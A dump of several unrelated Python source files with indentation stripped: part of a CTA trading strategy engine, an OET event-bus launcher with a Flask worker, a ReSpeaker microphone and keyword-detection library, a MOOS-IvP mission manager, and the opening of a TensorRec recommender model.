"""
orders = self.main_engine.get_all_orders()
for o in orders:
if o.orderRef in self.strategies:
self.orderid_strategy_map[o.vt_orderid] = self.strategies[o.orderRef]
self.strategy_orderid_map[o.orderRef].add(o.vt_orderid)
trades = self.main_engine.get_all_trades()
for t in trades:
if t.orderRef in self.strategies:
database_manager.save_trade_data([t], t.orderRef)
def load_strategy_class_from_folder(self, path: Path, module_name: str = ""):
"""
Load strategy class from certain folder.
"""
for dirpath, dirnames, filenames in os.walk(str(path)):
for filename in filenames:
if filename.endswith(".py"):
strategy_module_name = ".".join(
[module_name, filename.replace(".py", "")])
self.load_strategy_class_from_module(strategy_module_name)
def load_strategy_class_from_module(self, module_name: str):
"""
Load strategy class from module file.
"""
try:
module = importlib.import_module(module_name)
for name in dir(module):
value = getattr(module, name)
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
def load_strategy_data(self):
"""
Load strategy data from json file.
"""
self.strategy_data = load_json(self.data_filename)
def sync_strategy_data(self, strategy: CtaTemplate):
"""
Sync strategy data into json file.
"""
data = strategy.get_variables()
data.pop("inited") # Strategy status (inited, trading) should not be synced.
data.pop("trading")
self.strategy_data[strategy.strategy_name] = data
save_json(self.data_filename, self.strategy_data)
def get_all_strategy_class_names(self):
"""
Return names of strategy classes loaded.
"""
return list(self.classes.keys())
def get_strategy_class_parameters(self, class_name: str):
"""
Get default parameters of a strategy class.
"""
strategy_class = self.classes[class_name]
parameters = {}
for name in strategy_class.parameters:
parameters[name] = getattr(strategy_class, name)
return parameters
def get_strategy_parameters(self, strategy_name):
"""
Get parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
return strategy.get_parameters()
def init_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.init_strategy(strategy_name)
def start_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.start_strategy(strategy_name)
def recover_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.recover_strategy(strategy_name)
def stop_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.stop_strategy(strategy_name)
def close_all_strategies_pos(self):
"""
"""
for strategy_name in self.strategies.keys():
self.close_strategy_pos(strategy_name)
def load_strategy_setting(self):
"""
Load setting file.
"""
self.strategy_setting = load_json(self.setting_filename)
for strategy_name, strategy_config in self.strategy_setting.items():
self.add_strategy(
strategy_config["class_name"],
strategy_name,
strategy_config["vt_symbol"],
strategy_config["setting"]
)
def load_daily_close_setting(self):
setting = load_json(self.daily_close_filename)
if 'time' in setting:
try:
self.daily_close_setting = datetime.now().replace(hour=setting['time'][0], minute=setting['time'][1], second=0)
except Exception as e:
self.write_log(f"配置日内平仓错误:{e}")
else:
self.daily_close_setting = {}
def update_strategy_setting(self, strategy_name: str, setting: dict):
"""
Update setting file.
"""
strategy = self.strategies[strategy_name]
self.strategy_setting[strategy_name] = {
"class_name": strategy.__class__.__name__,
"vt_symbol": strategy.vt_symbol,
"setting": setting,
}
save_json(self.setting_filename, self.strategy_setting)
def remove_strategy_setting(self, strategy_name: str):
"""
Update setting file.
"""
if strategy_name not in self.strategy_setting:
return
self.strategy_setting.pop(strategy_name)
save_json(self.setting_filename, self.strategy_setting)
def put_stop_order_event(self, stop_order: StopOrder):
"""
Put an event to update stop order status.
"""
event = Event(EVENT_CTA_STOPORDER, stop_order)
self.event_engine.put(event)
def put_strategy_event(self, strategy: CtaTemplate):
"""
Put an event to update strategy status.
"""
data = strategy.get_data()
event = Event(EVENT_CTA_STRATEGY, data)
self.event_engine.put(event)
def write_log(self, msg: str, strategy: CtaTemplate = None):
"""
Create cta engine log event.
"""
if strategy:
msg = f"{strategy.strategy_name}: {msg}"
log = LogData(msg=msg, gateway_name="CtaStrategy")
event = Event(type=EVENT_CTA_LOG, data=log)
self.event_engine.put(event)
def send_notification(self, msg: str, strategy: CtaTemplate = None):
"""
Create cta engine log event.
"""
if strategy:
msg = f"{strategy.strategy_name}: {msg}"
log = LogData(msg=msg, gateway_name="CtaStrategy")
event = Event(type=EVENT_CTA_NOTIFY, data=log)
self.event_engine.put(event)
def send_email(self, msg: str, strategy: CtaTemplate = None):
"""
Send email to default receiver.
"""
if strategy:
subject = f"{strategy.strategy_name}"
else:
subject = "CTA策略引擎"
self.main_engine.send_email(subject, msg)
|
main.py
|
import logging.config
import logging.handlers
import threading
from typing import List
import requests
from flask import request
from pubsub import pub
from oet.event import topics
from oet.mptools import (
EventMessage,
MainContext,
MPQueue,
QueueProcWorker,
default_signal_handler,
init_signals,
)
from oet.procedure.application import restserver
from oet.procedure.application.application import (
PrepareProcessCommand,
ScriptExecutionService,
StartProcessCommand,
StopProcessCommand,
)
class EventBusWorker(QueueProcWorker):
"""
EventBusWorker converts external inter-process pub/sub messages to and
from local intra-process pubsub messages.
EventBusWorker uses the QueueProcWorker's 'work queue' as an inbox for
pub/sub EventMessages sent by other ProcWorkers. EventMessages received
on this queue are rebroadcast locally as pypubsub messages. Likewise, the
EventBusWorker listens to all pypubsub messages broadcast locally,
converts them to pub/sub EventQueue messages, and puts them on the 'main'
queue for transmission to other EventBusWorkers.
"""
def republish(self, topic: pub.Topic = pub.AUTO_TOPIC, **kwargs) -> None:
"""
Republish a local event over the inter-process event bus.
:param topic: message topic, set automatically by pypubsub
:param kwargs: any metadata associated with pypubsub message
:return:
"""
# avoid infinite loop - do not republish external events
try:
msg_src = kwargs.pop("msg_src")
except KeyError:
# No message source = virgin event published on pypubsub
msg_src = self.name
# ... but if this is a local message (message source = us), send it
# out to the main queue and hence on to other EventBusWorkers
if msg_src == self.name:
# Convert pypubsub event to the equivalent mptools EventMessage
msg = EventMessage(
self.name, "PUBSUB", dict(topic=topic.name, kwargs=kwargs)
)
# not that this is a blocking put. If the queue is full, this call
# will block until the queue has room to accept the message
self.log(logging.DEBUG, "Queueing internal event: %s", msg)
self.event_q.put(msg)
def startup(self) -> None:
"""
Connect republishing function to pypubsub.
"""
super().startup()
# Request republish method be called for all pypubsub messages
pub.subscribe(self.republish, pub.ALL_TOPICS)
def shutdown(self) -> None:
"""
Disconnect republishing function from pypubsub
"""
super().shutdown()
# Technically, unsubscribing is unnecessary as pypubsub holds weak
# references to listeners and automatically unsubscribes listeners
# that have been deleted
pub.unsubscribe(self.republish, pub.ALL_TOPICS)
def main_func(self, evt: EventMessage) -> None:
"""
Republish external pub/sub message locally.
QueueProcWorker ensures that main_func is called for every item in the
work queue. This function takes that work item - the external pub/sub
EventMessage - and rebroadcasts it locally as a pypubsub message.
:param evt: pub/sub EventMessage to broadcast locally
"""
# avoid infinite loop - do not reprocess events that originated from us
if evt.msg_src != self.name:
self.log(logging.DEBUG, "Republishing external event: %s", evt)
payload = evt.msg
topic = payload["topic"]
pub.sendMessage(topic, msg_src=evt.msg_src, **payload["kwargs"])
else:
self.log(logging.DEBUG, "Discarding internal event: %s", evt)
def send_message(self, topic, **kwargs):
pub.sendMessage(topic, msg_src=self.name, **kwargs)
class FlaskWorker(EventBusWorker):
"""
FlaskWorker is an EventBusWorker that runs Flask.
By extending EventBusWorker, Flask functions can use pypubsub to subscribe
to and publish messages, and these messages will put on the main queue to
be broadcast to other EventBusWorkers.
"""
def startup(self) -> None:
# Call super.startup to enable pypubsub <-> event queue republishing
super().startup()
app = restserver.create_app(None)
# add route to run shutdown_flask() when /shutdown is accessed
app.add_url_rule("/shutdown", "shutdown", self.shutdown_flask, methods=["POST"])
# override default msg_src with our real process name
app.config.update(msg_src=self.name)
# start Flask in a thread as app.run is a blocking call
self.flask = threading.Thread(target=app.run, kwargs=dict(host="0.0.0.0"))
self.flask.start()
def shutdown(self) -> None:
# Call super.shutdown to disconnect from pypubsub
super().shutdown()
# flask can only be shut down by accessing a special Werkzeug function
# that is accessible from a request. Hence, we send a request to a
# special URL that will access and call that function.
requests.post("http://127.0.0.1:5000/shutdown")
self.flask.join(timeout=3)
super().shutdown()
@staticmethod
def shutdown_flask():
func = request.environ.get("werkzeug.server.shutdown")
if func is None:
raise RuntimeError("Not running with the Werkzeug Server")
func()
return "Stopping Flask"
class ScriptExecutionServiceWorker(EventBusWorker):
"""
ScriptExecutionService listens for user request messages, calling the
appropriate ScriptExecutionService function and broadcasting its response.
Actions that occur in the user request domain ('user clicked start
observation', 'user aborted observation using the CLI', etc.) are
broadcast as events. ScriptExecutionServiceWorker listens for events on
these topics and triggers the required action in the script execution
domain ('start a script', 'abort a script', etc.).
Currently, the result of the action that occurred in the script execution
domain (=the return object from the ScriptExecutionService) is broadcast
to the world by the ScriptExectutionServiceWorker. This could change so
that the ScriptExecutionService itself sends the message.
"""
def prepare(self, msg_src, request_id: str, cmd: PrepareProcessCommand):
self.log(logging.DEBUG, "Prepare procedure request %s: %s", request_id, cmd)
try:
summary = self.ses.prepare(cmd)
except (FileNotFoundError, ValueError) as e:
# ValueError raised on invalid URI prefix
# FileNotFoundError raised when file not found.
self.log(logging.INFO, "Prepare procedure %s failed: %s", request_id, e)
# TODO create failure topic for failures in procedure domain
self.send_message(
topics.procedure.lifecycle.created, request_id=request_id, result=e
)
else:
self.log(
logging.DEBUG, "Prepare procedure %s result: %s", request_id, summary
)
self.send_message(
topics.procedure.lifecycle.created,
request_id=request_id,
result=summary,
)
def start(self, msg_src, request_id: str, cmd: StartProcessCommand):
self.log(logging.DEBUG, "Start procedure request %s: %s", request_id, cmd)
summary = self.ses.start(cmd)
self.log(logging.DEBUG, "Start procedure %s result: %s", request_id, summary)
self.send_message(
topics.procedure.lifecycle.started, request_id=request_id, result=summary
)
def list(self, msg_src, request_id: str, pids=None):
self.log(logging.DEBUG, "List procedures for request %s", request_id)
try:
summaries = self.ses.summarise(pids)
except ValueError:
# ValueError raised when PID not found.
summaries = []
self.log(logging.DEBUG, "List result: %s", summaries)
self.send_message(
topics.procedure.pool.list, request_id=request_id, result=summaries
)
def stop(self, msg_src, request_id: str, cmd: StopProcessCommand):
self.log(logging.DEBUG, "Stop procedure request %s: %s", request_id, cmd)
try:
summary = self.ses.stop(cmd)
except FileNotFoundError as e:
# FileNotFoundError raised when abort.py script not found
self.log(logging.INFO, "Stop procedure %s failed: %s", request_id, e)
# TODO create failure topic for failures in procedure domain
# (or refactor abortion script creation so that FileNotFound
# is caught only once in prepare)
self.send_message(
topics.procedure.lifecycle.stopped, request_id=request_id, result=e
)
else:
self.log(logging.DEBUG, "Stop result: %s", summary)
self.send_message(
topics.procedure.lifecycle.stopped,
request_id=request_id,
result=summary,
)
def startup(self) -> None:
super().startup()
self.ses = ScriptExecutionService()
# wire up topics to the corresponding SES methods
pub.subscribe(self.prepare, topics.request.procedure.create)
pub.subscribe(self.start, topics.request.procedure.start)
pub.subscribe(self.list, topics.request.procedure.list)
pub.subscribe(self.stop, topics.request.procedure.stop)
def shutdown(self) -> None:
pub.unsubscribe(self.prepare, pub.ALL_TOPICS)
pub.unsubscribe(self.start, pub.ALL_TOPICS)
pub.unsubscribe(self.list, pub.ALL_TOPICS)
pub.unsubscribe(self.stop, pub.ALL_TOPICS)
super().shutdown()
def main():
"""
Create the OET components and start an event loop that dispatches messages
between them.
:param logging_config:
"""
# All queues and processes are created via a MainContext so that they are
# shared correctly and have consistent lifecycle management
with MainContext() as main_ctx:
# wire SIGINT and SIGTERM signal handlers to the shutdown_event Event
# monitored by all processes, so that the processes know when
# application termination has been requested.
init_signals(
main_ctx.shutdown_event, default_signal_handler, default_signal_handler
)
# create our message queues:
# manager_q is the message queue for messages from the ScriptExecutionWorker
# flask_q is the queue for messages intended for the FlaskWorker process
script_executor_q = main_ctx.MPQueue()
flask_q = main_ctx.MPQueue()
# event bus messages received on the event_queue (the main queue that
# child processes push to and which the while loop below listens to)
# will be pushed onto the queues in this list
event_bus_queues = [script_executor_q, flask_q]
# create the OET components, which will run in child Python processes
# and monitor the message queues here for event bus messages
main_ctx.Proc("SESWorker", ScriptExecutionServiceWorker, script_executor_q)
main_ctx.Proc("FlaskWorker", FlaskWorker, flask_q)
# with all workers and queues set up, start processing messages
main_loop(main_ctx, event_bus_queues)
def main_loop(main_ctx: MainContext, event_bus_queues: List[MPQueue]):
"""
Main message parsing and routing loop, extracted from main() to increase
testability.
:param main_ctx:
:param event_bus_queues:
:return:
"""
while not main_ctx.shutdown_event.is_set():
event = main_ctx.event_queue.safe_get()
if not event:
continue
elif event.msg_type == "PUBSUB":
for q in event_bus_queues:
q.put(event)
elif event.msg_type == "FATAL":
main_ctx.log(logging.INFO, f"Fatal Event received: {event.msg}")
break
elif event.msg_type == "END":
main_ctx.log(logging.INFO, f"Shutdown Event received: {event.msg}")
break
else:
main_ctx.log(logging.ERROR, f"Unknown Event: {event}")
if __name__ == "__main__":
main()
|
microphone.py
|
"""
ReSpeaker Python Library
Copyright (c) 2016 Seeed Technology Limited.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import wave
import types
import collections
import random
import string
import logging
from threading import Thread, Event
try: # Python 2
import Queue
except: # Python 3
import queue as Queue
import pyaudio
from respeaker.pixel_ring import pixel_ring
from respeaker.vad import vad
logger = logger = logging.getLogger('mic')
collecting_audio = os.getenv('COLLECTING_AUDIO', 'no')
def random_string(length):
return ''.join(random.choice(string.digits) for _ in range(length))
def save_as_wav(data, prefix):
prefix = prefix.replace(' ', '_')
filename = prefix + random_string(8) + '.wav'
while os.path.isfile(filename):
filename = prefix + random_string(8) + '.wav'
f = wave.open(filename, 'wb')
f.setframerate(16000)
f.setsampwidth(2)
f.setnchannels(1)
f.writeframes(data)
f.close()
logger.info('Save audio as %s' % filename)
class Microphone:
sample_rate = 16000
frames_per_buffer = 512
listening_mask = (1 << 0)
detecting_mask = (1 << 1)
recording_mask = (1 << 2)
def __init__(self, pyaudio_instance=None, quit_event=None, decoder=None):
pixel_ring.set_color(rgb=0x400000)
self.pyaudio_instance = pyaudio_instance if pyaudio_instance else pyaudio.PyAudio()
self.device_index = None
for i in range(self.pyaudio_instance.get_device_count()):
dev = self.pyaudio_instance.get_device_info_by_index(i)
name = dev['name'].encode('utf-8')
# print(i, name, dev['maxInputChannels'], dev['maxOutputChannels'])
if name.lower().find(b'respeaker') >= 0 and dev['maxInputChannels'] > 0:
logger.info('Use {}'.format(name))
self.device_index = i
break
if not self.device_index:
device = self.pyaudio_instance.get_default_input_device_info()
self.device_index = device['index']
self.stream = self.pyaudio_instance.open(
input=True,
start=False,
format=pyaudio.paInt16,
channels=1,
rate=self.sample_rate,
frames_per_buffer=self.frames_per_buffer,
stream_callback=self._callback,
input_device_index=self.device_index,
)
self.quit_event = quit_event if quit_event else Event()
self.listen_queue = Queue.Queue()
self.detect_queue = Queue.Queue()
self.decoder = decoder if decoder else self.create_decoder()
self.decoder.start_utt()
self.status = 0
self.active = False
self.listen_history = collections.deque(maxlen=8)
self.detect_history = collections.deque(maxlen=48)
self.wav = None
self.record_countdown = None
self.listen_countdown = [0, 0]
@staticmethod
def create_decoder():
from pocketsphinx.pocketsphinx import Decoder
path = os.path.dirname(os.path.realpath(__file__))
pocketsphinx_data = os.getenv('POCKETSPHINX_DATA', os.path.join(path, 'pocketsphinx-data'))
hmm = os.getenv('POCKETSPHINX_HMM', os.path.join(pocketsphinx_data, 'hmm'))
dict = os.getenv('POCKETSPHINX_DIC', os.path.join(pocketsphinx_data, 'dictionary.txt'))
kws = os.getenv('POCKETSPHINX_KWS', os.path.join(pocketsphinx_data, 'keywords.txt'))
config = Decoder.default_config()
config.set_string('-hmm', hmm)
config.set_string('-dict', dict)
config.set_string('-kws', kws)
# config.set_int('-samprate', SAMPLE_RATE) # uncomment if rate is not 16000. use config.set_float() on ubuntu
config.set_int('-nfft', 512)
config.set_float('-vad_threshold', 2.7)
config.set_string('-logfn', os.devnull)
return Decoder(config)
def recognize(self, data):
self.decoder.end_utt()
self.decoder.start_utt()
if not data:
return ''
if isinstance(data, types.GeneratorType):
for d in data:
self.decoder.process_raw(d, False, False)
else:
self.decoder.process_raw(data, False, True)
hypothesis = self.decoder.hyp()
if hypothesis:
logger.info('Recognized {}'.format(hypothesis.hypstr))
return hypothesis.hypstr
return ''
def detect(self, keyword=None):
self.decoder.end_utt()
self.decoder.start_utt()
pixel_ring.off()
self.detect_history.clear()
self.detect_queue.queue.clear()
self.status |= self.detecting_mask
self.stream.start_stream()
result = None
logger.info('Start detecting')
while not self.quit_event.is_set():
size = self.detect_queue.qsize()
if size > 4:
logger.info('Too many delays, {} in queue'.format(size))
data = self.detect_queue.get()
self.detect_history.append(data)
self.decoder.process_raw(data, False, False)
hypothesis = self.decoder.hyp()
if hypothesis:
logger.info('Detected {}'.format(hypothesis.hypstr))
if collecting_audio != 'no':
logger.debug(collecting_audio)
save_as_wav(b''.join(self.detect_history), hypothesis.hypstr)
self.detect_history.clear()
if keyword:
if hypothesis.hypstr.find(keyword) >= 0:
result = hypothesis.hypstr
break
else:
self.decoder.end_utt()
self.decoder.start_utt()
self.detect_history.clear()
else:
result = hypothesis.hypstr
break
self.status &= ~self.detecting_mask
self.stop()
return result
wakeup = detect
def listen(self, duration=9, timeout=3):
vad.reset()
self.listen_countdown[0] = (duration * self.sample_rate + self.frames_per_buffer - 1) / self.frames_per_buffer
self.listen_countdown[1] = (timeout * self.sample_rate + self.frames_per_buffer - 1) / self.frames_per_buffer
self.listen_queue.queue.clear()
self.status |= self.listening_mask
self.start()
pixel_ring.listen()
logger.info('Start listening')
def _listen():
try:
data = self.listen_queue.get(timeout=timeout)
while data and not self.quit_event.is_set():
yield data
data = self.listen_queue.get(timeout=timeout)
except Queue.Empty:
pass
self.stop()
return _listen()
def record(self, file_name, seconds=1800):
self.wav = wave.open(file_name, 'wb')
self.wav.setsampwidth(2)
self.wav.setnchannels(1)
self.wav.setframerate(self.sample_rate)
self.record_countdown = (seconds * self.sample_rate + self.frames_per_buffer - 1) / self.frames_per_buffer
self.status |= self.recording_mask
self.start()
def quit(self):
self.status = 0
self.quit_event.set()
self.listen_queue.put('')
if self.wav:
self.wav.close()
self.wav = None
def start(self):
if self.stream.is_stopped():
self.stream.start_stream()
def stop(self):
if not self.status and self.stream.is_active():
self.stream.stop_stream()
def close(self):
self.quit()
self.stream.close()
def _callback(self, in_data, frame_count, time_info, status):
if self.status & self.recording_mask:
pass
if self.status & self.detecting_mask:
self.detect_queue.put(in_data)
if self.status & self.listening_mask:
active = vad.is_speech(in_data)
if active:
if not self.active:
for d in self.listen_history:
self.listen_queue.put(d)
self.listen_countdown[0] -= 1
self.listen_history.clear()
self.listen_queue.put(in_data)
self.listen_countdown[0] -= 1
else:
if self.active:
self.listen_queue.put(in_data)
else:
self.listen_history.append(in_data)
self.listen_countdown[1] -= 1
if self.listen_countdown[0] <= 0 or self.listen_countdown[1] <= 0:
self.listen_queue.put('')
self.status &= ~self.listening_mask
pixel_ring.wait()
logger.info('Stop listening')
self.active = active
if self.status & self.recording_mask:
self.wav.writeframes(in_data)
self.record_countdown -= 1
if self.record_countdown <= 0:
self.status &= ~self.recording_mask
self.wav.close()
return None, pyaudio.paContinue
def task(quit_event):
import time
mic = Microphone(quit_event=quit_event)
while not quit_event.is_set():
if mic.wakeup('respeaker'):
print('Wake up')
data = mic.listen()
text = mic.recognize(data)
if text:
time.sleep(3)
print('Recognized %s' % text)
def main():
import time
logging.basicConfig(level=logging.DEBUG)
q = Event()
t = Thread(target=task, args=(q,))
t.start()
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print('Quit')
q.set()
break
t.join()
def test_record():
import time
mic = Microphone()
mic.record('hello.wav', seconds=3)
time.sleep(3)
mic.quit()
if __name__ == '__main__':
main()
|
manager.py
|
import time
from queue import Queue
from threading import Thread, Lock
from mivp_agent.const import KEY_ID
from mivp_agent.const import KEY_EPISODE_MGR_REPORT, KEY_EPISODE_MGR_STATE
from mivp_agent.bridge import ModelBridgeServer
from mivp_agent.util.validate import validateAction
from mivp_agent.util.parse import parse_report
INSTR_SEND_STATE = {
'speed': 0.0,
'course': 0.0,
'posts': {},
'ctrl_msg': 'SEND_STATE'
}
INSTR_START = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=start'
},
'ctrl_msg': 'SEND_STATE'
}
INSTR_PAUSE = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=pause'
},
'ctrl_msg': 'SEND_STATE'
}
INSTR_STOP = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=hardstop'
},
'ctrl_msg': 'SEND_STATE'
}
INSTR_RESET_SUCCESS = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=reset,success=true'
},
'ctrl_msg': 'SEND_STATE'
}
INSTR_RESET_FAILURE = {
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=reset,success=false'
},
'ctrl_msg': 'SEND_STATE'
}
class MissionManager:
'''
This is the primary method for interfacing with moos-ivp-agent's BHV_Agent
Examples:
It is recommended to use MissionManager with the python context manager
```
from mivp_agent.manager import MissionManager
with MissionManager() as mgr:
mgr.wait_for(['felix', 'evan'])
...
```
'''
def __init__(self):
self._msg_queue = Queue()
self._vnames = []
self._vname_lock = Lock()
self._vehicle_count = 0
self._episode_manager_states = {}
self._ems_lock = Lock()
self._episode_manager_nums = {}
self._emn_lock = Lock()
# Dict to hold queues of vnames to reset
self._vresets = Queue()
self._thread = None
self._stop_signal = False
def __enter__(self):
self.start()
return self
def start(self):
'''
It is **not recommended** to use this method directly. Instead, consider using this class with the python context manager. This method starts a thread to read from the `ModelBridgeServer`.
Returns:
bool: False if thread has already been started, True otherwise
'''
if self._thread is not None:
return False
self._thread = Thread(target=self._server_thread, daemon=True)
self._thread.start()
return True
def _server_thread(self):
live_msg_list = []
address_map = {}
with ModelBridgeServer() as server:
while not self._stop_signal:
# Accept new clients
addr = server.accept()
if addr is not None:
print(f'Got new connection: {addr}')
server.send_instr(addr, INSTR_SEND_STATE)
# Listen for messages from vehicles
for addr in server._clients:
msg = server.listen(addr)
if msg is not None:
with self._vname_lock:
if msg[KEY_ID] not in self._vnames:
print(f'Got new vehicle: {msg[KEY_ID]}')
vname = msg[KEY_ID]
address_map[vname] = addr
self._vnames.append(vname)
self._vehicle_count += 1
m = MissionMessage(addr, msg)
with self._ems_lock:
self._episode_manager_states[m.vname] = m.episode_state
with self._emn_lock:
if m.episode_report is None:
self._episode_manager_nums[m.vname] = None
else:
self._episode_manager_nums[m.vname] = m.episode_report['NUM']
live_msg_list.append(m)
self._msg_queue.put(m)
# Send responses to vehicle message if there are any
for i, m in enumerate(live_msg_list):
with m._rsp_lock:
if m._response is None:
continue
# If we got there is response send and remove from list
live_msg_list.remove(m)
server.send_instr(m._addr, m._response)
# Handle reseting of vehicles
while not self._vresets.empty():
vname, success = self._vresets.get()
if vname not in address_map:
raise RuntimeError(
f'Receeived reset for unknown vehicle: {vname}')
instr = INSTR_RESET_FAILURE
if success:
instr = INSTR_RESET_SUCCESS
server.send_instr(address_map[vname], instr)
def are_present(self, vnames):
'''
Used to see if a specified list of vehicles has connected to the `MissionManager` instance yet.
See also: [`wait_for()`][mivp_agent.manager.MissionManager.wait_for]
Args:
vnames (iterable): A list / tuple of `str` values to look for
'''
for vname in vnames:
with self._vname_lock:
if vname not in self._vnames:
return False
return True
def wait_for(self, vnames, sleep=0.1):
'''
Used to block until a specified list of vehicles has connect to the `MissionManager` instance.
Args:
vnames (iterable): A list / tuple of `str` values to look for
sleep (float): Amount of time in seconds to sleep for between checks
'''
while not self.are_present(vnames):
time.sleep(sleep)
def get_message(self, block=True):
'''
Used as the primary method for receiving data from `BHV_Agent`.
**NOTE:** Messages **MUST** be responded to as `BHV_Agent` will not send another update until it has a response to the last.
Args:
block (bool): A boolean specifying if the method will wait until a message present or return immediately
Returns:
obj: A instance of [`MissionMessage()`][mivp_agent.manager.MissionMessage] or `None` depending on the blocking behavior
Example:
```
msg = mgr.get_message()
NAV_X = msg.state['NAV_X']
NAV_Y = msg.state['NAV_Y']
# ...
# Some processing
# ...
msg.act({
'speed': 1.0
'course': 180.0
})
```
'''
return self._msg_queue.get(block=block)
def get_vehicle_count(self):
'''
Returns:
int: The amount of vehicles that have connected to this instance of `MissionManager`
'''
return self._vehicle_count
def episode_state(self, vname):
'''
This is used to interrogate the state of a connected vehicle's `pEpisodeManager`
Args:
vname (str): the vname of the vehicle
Returns:
str: The state of the `pEpisodeManager` on the vehicle
'''
with self._ems_lock:
# Should be all strings so no reference odd ness
return self._episode_manager_states[vname]
def episode_nums(self):
'''
Returns:
dict: A key, value pair maping vnames to the episode numbers of the `pEpisodeManager` app on that vehicle
'''
with self._emn_lock:
return self._episode_manager_nums.copy()
def reset_vehicle(self, vname, success=False):
# Untested
self._vresets.append((vname, success))
def close(self):
if self._thread is not None:
self._stop_signal = True
self._thread.join()
def __exit__(self, exc_type, exc_value, traceback):
self.close()
class MissionMessage:
'''
This class is used to parse incoming messages into attributes (see bellow) and provide a simple interface for responding to each message.
**IMPORTANT NOTE:** Messages **MUST** be responded by one of the following methods to as `BHV_Agent` will not send another update until it has a response to the last.
- [`act(action)`][mivp_agent.manager.MissionMessage.act] **<---- Most common**
- [`request_new()`][mivp_agent.manager.MissionMessage.request_new]
- [`start()`][mivp_agent.manager.MissionMessage.start]
- [`pause()`][mivp_agent.manager.MissionMessage.pause]
- [`stop()`][mivp_agent.manager.MissionMessage.stop]
Attributes:
vname (str): The vehicle's name which generated the message.
state (dict): A dictionary containing key, value pairs of MOOS vars and their associated value at the time the message was created by `BHV_Agent`.
episode_report (dict or None): If `pEpisodeManager` is present on the vehicle this message will contain any "report" generated by it at the end of episodes. If no `pEpisodeManager` is present, the **value will be** `None`.
episode_state (str or None): If `pEpisodeManager` is present on the vehicle this message will be the state which that app is broadcasting. Otherwise, it will be `None`.
'''
def __init__(self, addr, msg):
# For use my MissionManager
self._addr = addr
self._response = None
self._rsp_lock = Lock()
# For use by client
self.state = msg
self.vname = msg[KEY_ID]
self.episode_report = None
self.episode_state = None
if self.state[KEY_EPISODE_MGR_REPORT] is not None:
self.episode_report = parse_report(
self.state[KEY_EPISODE_MGR_REPORT])
if self.state[KEY_EPISODE_MGR_STATE] is not None:
self.episode_state = self.state[KEY_EPISODE_MGR_STATE]
def _assert_no_rsp(self):
assert self._response is None, 'This message has already been responded to'
def act(self, action):
'''
This is used to send an action for the `BHV_Agent` to execute.
Args:
action (dict): An action to send (see below)
Example:
Actions submitted through `MissionMessage` are python dictionaries with the following **required** fields.
```
msg.act({
'speed': 1.0
'course': 180.0
})
```
Example:
Optionally, one can add a MOOS var and value they would like to post.
```
msg.act({
'speed': 0.0
'course': 0.0
'posts': {
'ACTION': 'ATTACK_LEFT'
},
})
```
'''
self._assert_no_rsp()
# Copy so we don't run into threading errors if client reuses the action dict
instr = action.copy()
if 'posts' not in action:
instr['posts'] = {}
validateAction(instr)
instr['ctrl_msg'] = 'SEND_STATE'
with self._rsp_lock:
self._response = instr
def start(self):
'''
This method is used to send a message to `pEpisodeManager` to **start** an episode. The following message will be constructed and dispatched.
```
{
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=start'
},
}
```
'''
self._assert_no_rsp()
with self._rsp_lock:
self._response = INSTR_START
def pause(self):
'''
This method is used to send a message to `pEpisodeManager` to **pause** after the current episode. The following messagewill be constructed and dispatched.
```
{
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=pause'
},
}
```
'''
self._assert_no_rsp()
with self._rsp_lock:
self._response = INSTR_PAUSE
def stop(self):
'''
This method is used to send a message to `pEpisodeManager` to **hardstop** an episode immediately. The following messagewill be constructed and dispatched.
```
{
'speed': 0.0,
'course': 0.0,
'posts': {
'EPISODE_MGR_CTRL': 'type=hardstop'
},
}
```
'''
self._assert_no_rsp()
with self._rsp_lock:
self._response = INSTR_STOP
def request_new(self):
'''
This method is used to send ask `BHV_Agent` to send another action.
'''
self._assert_no_rsp()
with self._rsp_lock:
self._response = INSTR_SEND_STATE
|
tensorrec.py
|
import logging
import numpy as np
import os,sys
import pickle
import time
import tensorflow as tf
import threading, thread
import multiprocessing
import itertools
from .errors import (
TfVersionException
)
from .input_utils import create_tensorrec_iterator, get_dimensions_from_tensorrec_dataset
from .loss_graphs import AbstractLossGraph, WMRBLossGraph
from .prediction_graphs import AbstractPredictionGraph, CosineSimilarityPredictionGraph
from .representation_graphs import AbstractRepresentationGraph, LinearRepresentationGraph
from .session_management import get_session
from .util import (variable_summaries, get_memory, multiple_workers, multiple_workers_thread, stop_subprocess, get_queue_size)
class TensorRec(object):
def __init__(self,
n_components=100,
n_tastes=1,
user_repr_graph=LinearRepresentationGraph(),
item_repr_graph=LinearRepresentationGraph(),
attention_graph=None,
prediction_graph=CosineSimilarityPredictionGraph(),
loss_graph=WMRBLossGraph(),
biased=False,
stratified_sample=False,
log_interval=100,
logdir='.',):
"""
A TensorRec recommendation model.
:param n_components: Integer
The dimension of a single output of the representation function. Must be >= 1.
:param n_tastes: Integer
The number of tastes/reprs to be calculated for each user. Must be >= 1.
:param user_repr_graph: AbstractRepresentationGraph
An object which inherits AbstractRepresentationGraph that contains a method to calculate user representations.
See tensorrec.representation_graphs for examples.
:param item_repr_graph: AbstractRepresentationGraph
